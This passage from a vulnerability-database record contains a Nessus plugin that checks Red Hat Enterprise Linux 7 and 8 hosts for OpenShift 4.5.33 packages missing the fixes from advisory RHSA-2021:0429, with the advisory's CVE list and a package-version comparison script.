'openshift_4_5_el7', 'openshift_4_6_el7', 'openshift_4_7_el7']},\n {'reference':'openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el7', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el7', 'openshift_4_2_el7', 'openshift_4_3_el7', 'openshift_4_4_el7', 'openshift_4_5_el7', 'openshift_4_6_el7', 'openshift_4_7_el7']},\n {'reference':'openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el7', 'openshift_4_2_el7', 'openshift_4_3_el7', 'openshift_4_4_el7', 'openshift_4_5_el7', 'openshift_4_6_el7', 'openshift_4_7_el7']},\n {'reference':'conmon-2.0.21-1.rhaos4.5.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'2', 'repo_list':['openshift_4_1_el8', 'openshift_4_2_el8', 'openshift_4_3_el8', 'openshift_4_4_el8', 'openshift_4_5_el8', 'openshift_4_6_el8', 'openshift_4_7_el8']},\n {'reference':'conmon-2.0.21-1.rhaos4.5.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'2', 'repo_list':['openshift_4_1_el8', 'openshift_4_2_el8', 'openshift_4_3_el8', 'openshift_4_4_el8', 'openshift_4_5_el8', 'openshift_4_6_el8', 'openshift_4_7_el8']},\n {'reference':'machine-config-daemon-4.5.0-202102050524.p0.git.2594.ff3b8c0.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el8', 'openshift_4_2_el8', 'openshift_4_3_el8', 'openshift_4_4_el8', 'openshift_4_5_el8', 'openshift_4_6_el8', 'openshift_4_7_el8']},\n {'reference':'machine-config-daemon-4.5.0-202102050524.p0.git.2594.ff3b8c0.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el8', 'openshift_4_2_el8', 'openshift_4_3_el8', 'openshift_4_4_el8', 'openshift_4_5_el8', 'openshift_4_6_el8', 'openshift_4_7_el8']},\n {'reference':'openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el8', 'openshift_4_2_el8', 'openshift_4_3_el8', 'openshift_4_4_el8', 'openshift_4_5_el8', 'openshift_4_6_el8', 'openshift_4_7_el8']},\n {'reference':'openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el8', 'openshift_4_2_el8', 'openshift_4_3_el8', 'openshift_4_4_el8', 'openshift_4_5_el8', 'openshift_4_6_el8', 'openshift_4_7_el8']},\n {'reference':'openshift-clients-redistributable-4.5.0-202102051529.p0.git.3612.61b096a.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el8', 'openshift_4_2_el8', 'openshift_4_3_el8', 'openshift_4_4_el8', 'openshift_4_5_el8', 'openshift_4_6_el8', 'openshift_4_7_el8']},\n {'reference':'openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el8', 'openshift_4_2_el8', 'openshift_4_3_el8', 'openshift_4_4_el8', 'openshift_4_5_el8', 'openshift_4_6_el8', 'openshift_4_7_el8']},\n {'reference':'openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el8', 'openshift_4_2_el8', 'openshift_4_3_el8', 'openshift_4_4_el8', 'openshift_4_5_el8', 'openshift_4_6_el8', 'openshift_4_7_el8']},\n {'reference':'runc-1.0.0-72.rhaos4.5.giteadfc6b.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el8', 'openshift_4_2_el8', 'openshift_4_3_el8', 'openshift_4_4_el8', 'openshift_4_5_el8', 'openshift_4_6_el8', 'openshift_4_7_el8']},\n {'reference':'runc-1.0.0-72.rhaos4.5.giteadfc6b.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el8', 'openshift_4_2_el8', 'openshift_4_3_el8', 'openshift_4_4_el8', 'openshift_4_5_el8', 'openshift_4_6_el8', 'openshift_4_7_el8']}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n repocheck = FALSE;\n if (empty_or_null(found_repos))\n {\n repocheck = TRUE;\n }\n else\n {\n foreach repo (repo_list) {\n if (contains_element(var:found_repos, value:repo))\n {\n repocheck = TRUE;\n break;\n }\n }\n }\n if (repocheck && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n if (empty_or_null(host_repo_list)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'conmon / jenkins / machine-config-daemon / openshift-ansible / etc');\n}\n", "naslFamily": "Red Hat Local Security Checks", "cpe": ["p-cpe:/a:redhat:enterprise_linux:machine-config-daemon", "p-cpe:/a:redhat:enterprise_linux:jenkins", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:runc", "p-cpe:/a:redhat:enterprise_linux:conmon", "p-cpe:/a:redhat:enterprise_linux:openshift-ansible-test", "p-cpe:/a:redhat:enterprise_linux:openshift-ansible", "p-cpe:/a:redhat:enterprise_linux:openshift-clients", "p-cpe:/a:redhat:enterprise_linux:openshift-hyperkube", "p-cpe:/a:redhat:enterprise_linux:openshift-clients-redistributable", "cpe:/o:redhat:enterprise_linux:8"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-04-16T03:09:15", "differentElements": ["sourceData"], "edition": 4}, {"bulletin": {"id": "REDHAT-RHSA-2021-0429.NASL", "hash": "9ada83734e4b32bbb452b6fac4a16e919f369c506d40c048a84ac3353e6f6493", "type": "nessus", "bulletinFamily": "scanner", "title": "RHEL 7 / 8 : OpenShift Container Platform 4.5.33 packages and (RHSA-2021:0429)", "description": "The remote Redhat Enterprise Linux 7 / 8 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2021:0429 advisory.\n\n - ant: insecure temporary file (CVE-2020-11979)\n\n - ant: insecure temporary file vulnerability (CVE-2020-1945)\n\n - jenkins: Arbitrary file read vulnerability in workspace browsers (CVE-2021-21602)\n\n - jenkins: XSS vulnerability in notification bar (CVE-2021-21603)\n\n - jenkins: Improper handling of REST API XML deserialization errors (CVE-2021-21604)\n\n - jenkins: Path traversal vulnerability in agent names (CVE-2021-21605)\n\n - jenkins: Arbitrary file existence check in file fingerprints (CVE-2021-21606)\n\n - jenkins: Excessive memory allocation in graph URLs leads to denial of service (CVE-2021-21607)\n\n - jenkins: Stored XSS vulnerability in button labels (CVE-2021-21608)\n\n - jenkins: Missing permission check for paths with specific prefix (CVE-2021-21609)\n\n - jenkins: Reflected XSS vulnerability in markup formatter preview (CVE-2021-21610)\n\n - jenkins: Stored XSS vulnerability on new item page (CVE-2021-21611)\n\n - jenkins: Filesystem traversal by privileged users (CVE-2021-21615)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "published": "2021-03-03T00:00:00", "modified": "2021-03-03T00:00:00", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 8.0, "vector": "AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/147015", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://access.redhat.com/security/cve/CVE-2021-21610", "https://cwe.mitre.org/data/definitions/79.html", "https://access.redhat.com/security/cve/CVE-2021-21602", "https://bugzilla.redhat.com/1925143", "https://cwe.mitre.org/data/definitions/863.html", "https://bugzilla.redhat.com/1925156", "https://access.redhat.com/security/cve/CVE-2020-1945", "https://bugzilla.redhat.com/1925145", "https://cwe.mitre.org/data/definitions/770.html", "https://access.redhat.com/security/cve/CVE-2021-21611", "https://cwe.mitre.org/data/definitions/20.html", "https://access.redhat.com/security/cve/CVE-2021-21607", "https://bugzilla.redhat.com/1921322", "https://access.redhat.com/security/cve/CVE-2021-21606", "https://bugzilla.redhat.com/1925159", "https://access.redhat.com/security/cve/CVE-2021-21604", "https://access.redhat.com/security/cve/CVE-2021-21603", "https://bugzilla.redhat.com/1925160", "https://cwe.mitre.org/data/definitions/22.html", "https://access.redhat.com/security/cve/CVE-2020-11979", "https://access.redhat.com/security/cve/CVE-2021-21609", "https://cwe.mitre.org/data/definitions/377.html", "https://bugzilla.redhat.com/1925141", "https://cwe.mitre.org/data/definitions/59.html", "https://access.redhat.com/security/cve/CVE-2021-21615", "https://cwe.mitre.org/data/definitions/502.html", "https://bugzilla.redhat.com/1837444", "https://access.redhat.com/security/cve/CVE-2021-21608", "https://bugzilla.redhat.com/1925161", "https://bugzilla.redhat.com/1925157", "https://bugzilla.redhat.com/1925140", "https://bugzilla.redhat.com/1925151", "https://bugzilla.redhat.com/1903702", "https://access.redhat.com/errata/RHSA-2021:0429", "https://access.redhat.com/security/cve/CVE-2021-21605"], "cvelist": ["CVE-2021-21609", "CVE-2021-21607", "CVE-2021-21608", "CVE-2021-21606", "CVE-2021-21604", "CVE-2020-11979", "CVE-2020-1945", "CVE-2021-21602", "CVE-2021-21615", "CVE-2021-21603", "CVE-2021-21610", "CVE-2021-21611", "CVE-2021-21605"], "immutableFields": [], "lastseen": "2021-07-27T03:33:21", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"modified": "2021-07-27T03:33:21", "references": [{"idList": ["RH:CVE-2021-21606", "RH:CVE-2021-21605", "RH:CVE-2021-21602", "RH:CVE-2021-21611", "RH:CVE-2021-21615", "RH:CVE-2021-21609", "RH:CVE-2021-21607", "RH:CVE-2021-21603", "RH:CVE-2021-21608", "RH:CVE-2021-21604", "RH:CVE-2020-11979", "RH:CVE-2020-1945", "RH:CVE-2021-21610"], "type": "redhatcve"}, {"idList": ["USN-4380-1"], "type": "ubuntu"}, {"idList": ["OPENVAS:1361412562310877939", "OPENVAS:1361412562310844454", "OPENVAS:1361412562310877930"], "type": "openvas"}, {"idList": ["GHSA-F62V-XPXF-3V68", "GHSA-4P6W-M9WC-C9C9"], "type": "github"}, {"idList": ["OPENSUSE-SU-2020:1022-1"], "type": "suse"}, {"idList": ["UB:CVE-2020-11979", "UB:CVE-2020-1945"], "type": "ubuntucve"}, {"idList": ["ORACLE:CPUJUL2020", "ORACLE:CPUAPR2021", "ORACLE:CPUOCT2020", "ORACLE:CPUJAN2021", "ORACLE:CPUJUL2021"], "type": "oracle"}, {"idList": ["FEDORA:52396606732B", "FEDORA:6869030D3139", "FEDORA:146FE30DD5E7", "FEDORA:2D51F60C28B2", "FEDORA:88EAA30905CF"], "type": "fedora"}, {"idList": ["CVE-2021-21609", "CVE-2021-21607", "CVE-2021-21608", "CVE-2021-21606", "CVE-2021-21602", "CVE-2021-21615", "CVE-2021-21603", "CVE-2021-21610", "CVE-2021-21611", "CVE-2021-21605"], "type": "cve"}, {"idList": ["6D5F1B0B-B865-48D5-935B-3FB6EBB425FC"], "type": "freebsd"}, {"idList": ["ASA-202005-15", "ASA-202101-41", "ASA-202012-5"], "type": "archlinux"}, {"idList": ["GLSA-202007-34", "GLSA-202011-18"], "type": "gentoo"}, {"idList": ["RHSA-2021:0429", "RHSA-2020:4961", "RHSA-2021:0637", "RHSA-2021:0423", "RHSA-2020:4960", "RHSA-2021:0719", "RHSA-2020:2618"], "type": "redhat"}, {"idList": ["GENTOO_GLSA-202011-18.NASL", "PHOTONOS_PHSA-2020-2_0-0291_APACHE.NASL", "EULEROS_SA-2021-1133.NASL", "REDHAT-RHSA-2021-0637.NASL", "FEDORA_2020-92B1D001B3.NASL", "FREEBSD_PKG_D6F76976E86D4F9A936276C849B10DB2.NASL", "JENKINS_2_274.NASL", "REDHAT-RHSA-2021-0423.NASL", "JENKINS_2_276.NASL", "FREEBSD_PKG_425F214388764B0AAF84E0238C5C2062.NASL"], "type": "nessus"}], "rev": 2}, "score": {"modified": "2021-07-27T03:33:21", "rev": 2, "value": 6.4, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "147015", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2021:0429. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147015);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/07/26\");\n\n script_cve_id(\n \"CVE-2020-1945\",\n \"CVE-2020-11979\",\n \"CVE-2021-21602\",\n \"CVE-2021-21603\",\n \"CVE-2021-21604\",\n \"CVE-2021-21605\",\n \"CVE-2021-21606\",\n \"CVE-2021-21607\",\n \"CVE-2021-21608\",\n \"CVE-2021-21609\",\n \"CVE-2021-21610\",\n \"CVE-2021-21611\",\n \"CVE-2021-21615\"\n );\n script_xref(name:\"RHSA\", value:\"2021:0429\");\n script_xref(name:\"IAVA\", value:\"2020-A-0324\");\n script_xref(name:\"IAVA\", value:\"2021-A-0035-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0196\");\n script_xref(name:\"IAVA\", value:\"2021-A-0039-S\");\n\n script_name(english:\"RHEL 7 / 8 : OpenShift Container Platform 4.5.33 packages and (RHSA-2021:0429)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 7 / 8 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2021:0429 advisory.\n\n - ant: insecure temporary file (CVE-2020-11979)\n\n - ant: insecure temporary file vulnerability (CVE-2020-1945)\n\n - jenkins: Arbitrary file read vulnerability in workspace browsers (CVE-2021-21602)\n\n - jenkins: XSS vulnerability in notification bar (CVE-2021-21603)\n\n - jenkins: Improper handling of REST API XML deserialization errors (CVE-2021-21604)\n\n - jenkins: Path traversal vulnerability in agent names (CVE-2021-21605)\n\n - jenkins: Arbitrary file existence check in file fingerprints (CVE-2021-21606)\n\n - jenkins: Excessive memory allocation in graph URLs leads to denial of service (CVE-2021-21607)\n\n - jenkins: Stored XSS vulnerability in button labels (CVE-2021-21608)\n\n - jenkins: Missing permission check for paths with specific prefix (CVE-2021-21609)\n\n - jenkins: Reflected XSS vulnerability in markup formatter preview (CVE-2021-21610)\n\n - jenkins: Stored XSS vulnerability on new item page (CVE-2021-21611)\n\n - jenkins: Filesystem traversal by privileged users (CVE-2021-21615)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/20.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/22.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/59.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/79.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/377.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/502.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/770.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/863.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-1945\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-11979\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21602\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21603\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21604\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21605\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21606\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21607\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21608\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21609\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21610\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21611\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21615\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:0429\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1837444\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1903702\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1921322\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925141\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925143\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925145\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925151\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925156\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925157\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925159\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925161\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21605\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 22, 59, 79, 377, 502, 770, 863);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:conmon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:machine-config-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-ansible\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-ansible-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-clients-redistributable\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-hyperkube\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:runc\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release_list(operator: 'ge', os_version: os_ver, rhel_versions: ['7','8'])) audit(AUDIT_OS_NOT, 'Red Hat 7.x / 8.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nrepositories = {\n 'openshift_4_5_el7': [\n 'rhel-7-for-system-z-ose-4.5-debug-rpms',\n 'rhel-7-for-system-z-ose-4.5-rpms',\n 'rhel-7-for-system-z-ose-4.5-source-rpms',\n 'rhel-7-server-ose-4.5-debug-rpms',\n 'rhel-7-server-ose-4.5-rpms',\n 'rhel-7-server-ose-4.5-source-rpms'\n ],\n 'openshift_4_5_el8': [\n 'rhocp-4.5-for-rhel-8-s390x-debug-rpms',\n 'rhocp-4.5-for-rhel-8-s390x-rpms',\n 'rhocp-4.5-for-rhel-8-s390x-source-rpms',\n 'rhocp-4.5-for-rhel-8-x86_64-debug-rpms',\n 'rhocp-4.5-for-rhel-8-x86_64-rpms',\n 'rhocp-4.5-for-rhel-8-x86_64-source-rpms'\n ]\n};\n\nrepo_sets = rhel_get_valid_repo_sets(repositories:repositories);\nif(repo_sets == RHEL_REPOS_NO_OVERLAP_MESSAGE || empty_or_null(repo_sets)) audit(AUDIT_PACKAGE_LIST_MISSING, RHEL_REPO_AUDIT_PACKAGE_LIST_DETAILS);\n\npkgs = [\n {'reference':'conmon-2.0.21-1.rhaos4.5.el7', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'epoch':'2', 'repo_list':['openshift_4_5_el7']},\n {'reference':'conmon-2.0.21-1.rhaos4.5.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'epoch':'2', 'repo_list':['openshift_4_5_el7']},\n {'reference':'jenkins-2.263.3.1612434332-1.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el7']},\n {'reference':'openshift-ansible-4.5.0-202102031005.p0.git.0.c6839a2.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el7']},\n {'reference':'openshift-ansible-test-4.5.0-202102031005.p0.git.0.c6839a2.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el7']},\n {'reference':'openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el7', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el7']},\n {'reference':'openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el7']},\n {'reference':'openshift-clients-redistributable-4.5.0-202102051529.p0.git.3612.61b096a.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el7']},\n {'reference':'openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el7', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el7']},\n {'reference':'openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el7']},\n {'reference':'conmon-2.0.21-1.rhaos4.5.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'2', 'repo_list':['openshift_4_5_el8']},\n {'reference':'conmon-2.0.21-1.rhaos4.5.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'2', 'repo_list':['openshift_4_5_el8']},\n {'reference':'machine-config-daemon-4.5.0-202102050524.p0.git.2594.ff3b8c0.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el8']},\n {'reference':'machine-config-daemon-4.5.0-202102050524.p0.git.2594.ff3b8c0.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el8']},\n {'reference':'openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el8']},\n {'reference':'openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el8']},\n {'reference':'openshift-clients-redistributable-4.5.0-202102051529.p0.git.3612.61b096a.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el8']},\n {'reference':'openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el8']},\n {'reference':'openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el8']},\n {'reference':'runc-1.0.0-72.rhaos4.5.giteadfc6b.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el8']},\n {'reference':'runc-1.0.0-72.rhaos4.5.giteadfc6b.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el8']}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if 